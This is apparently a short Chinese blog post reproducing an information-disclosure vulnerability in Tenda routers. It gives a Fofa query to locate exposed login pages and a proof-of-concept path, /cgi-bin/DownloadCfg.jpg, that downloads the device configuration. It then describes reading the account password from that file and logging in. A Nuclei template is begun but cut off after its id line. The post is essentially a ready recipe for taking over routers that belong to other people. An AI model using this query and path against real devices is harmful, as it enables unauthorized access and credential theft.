admin管理员组

文章数量:1516870

漏洞描述


Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。


漏洞复现


1、Fofa
title=”Tenda | LOGIN”

2、界面如下

3、POC
/cgi-bin/DownloadCfg.jpg
4、从配置中查找账户密码(直接打开JPG就行了)

5、成功登录如下

Nucle脚本

id: tenda-router-downl

本文标签: 全漏洞系统编程